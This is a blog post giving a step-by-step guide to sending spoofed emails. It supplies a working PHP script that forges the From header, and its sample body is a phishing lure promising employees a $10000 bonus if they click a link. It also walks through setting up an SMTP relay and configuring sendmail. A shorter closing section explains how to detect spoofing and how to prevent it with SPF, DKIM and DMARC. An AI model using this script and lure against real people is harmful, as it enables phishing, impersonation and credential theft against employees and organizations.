A basic way to send ‘Spoofed Emails’
When it comes to phishing emails everyone is aware of the “From” address header of email whether if it was came from the original domain. But what if the “From” header can be forged to look like it came from legitimate server? It will pose a significant threat to an organization.
The spoofing email can be used to;
1. Send emails to employees asking to reset password
2. Send emails to employees with malicious attachments
3. Route users into malicious web sites to steal credentials
Users may fall victims into these kind of attacks since most of the users does not know how to inspect email headers like whether the email has passed SPF, DKIM and DMARC checks.
How to send a spoofed email;
There are several methods to send spoof emails, in here I will guide you through one method to achieve this.
First of all you have to create an smtp server for yourself
You can create a free smtp server from this link;
After creating account go to smtp & api and copy the credentials to a notepad.
Run the following PHP script to send the spoofed mail.
<?php
$email = 'victim@example.com';
$subject = 'Congratulations!!';
$body = 'Dear Employee, Congratulations!! You have recieved a bonus of $10000 for this month. click the link below to claim the bonus';
$headers = array(
'From: Info <info@example.com>',
'X-Mailer: PHP/' . phpversion()
);
mail($email, $subject, $body, implode("\n", $headers));
print('mail sent')
?>Configure $email, $subject, $body and $headers according to your need.
You can run this script in a code editor, I used ‘vscode’.
Note: to run this you will need php compiler package
Obtain the thread safe package from here;
https://windows.php.net/download/
Install and add PHP to PATH.
After installation go to PHP installation path and look for a file php.ini.developement
Rename it into php.ini and edit the php.ini file with following;
Note: You will need to remove the ‘;’ to uncomment the values.
extension=curl
extension=gd
extension=imap
extension=mbstring
extension=openssl
extension=pdo_mysqland scroll down until you find the ‘[mail function]’ section.
Give the following path for send mail which comes with the installation of xampp.
sendmail_path = C:\xampp\sendmail\sendmail.exeAnd go to the send mail path and edit sendmail.ini file with the following;
smtp_server= add the smtp server that you have created previously
smtp_port= 587
auth_username= give the username from the smtp server
auth_password= give the password from the smtp serverAfter successful execution of the script, I will receive a mail from the email address that look like a legit email.
How to Identify Spoofed Email;
- Sometimes attacker modifies the legitimate domains such as support@fb.com into supportteam@facebook.com which can be easily identified.
- If any links are present hover the mouse over the links to see whether the destination is legit
- To see whether any attachment are present which looks malicious
How to Prevent Spoofed emails;
- Configure SPF authentication protocol.
- Configure DKIM verification
- Configure DMARC checks
We can configure the DMARC to deliver the mail in three different ways if DMARC fail check is triggered.
- Report-only mode (p=none): This mode is called monitoring policy since it only gives insight in who’s sending email on behalf of a domain and will not affect the deliverability.
- Quarantine mode (p=quarantine): Spoofed email will be quarantined and will be delivered to the Spam or junk folder of the user’s mailbox if the DMARC check is failed.
- Reject mode (p=reject): Destination Server reject the email and it will not be delivered to the user. This mode will completely mitigate impact of spoofing.
Some email sent directly from the source after compromising the smtp server, in that case email header analysis alone cannot identify whether the email is legit since the SPF,DKIM and DMARC checks are passed.
if you know more methods to send spoof emails don’t hesitate to comment.
if you like this article please leave me a clap or two, and don’t forget to follow me as well.
find me on YouTube;
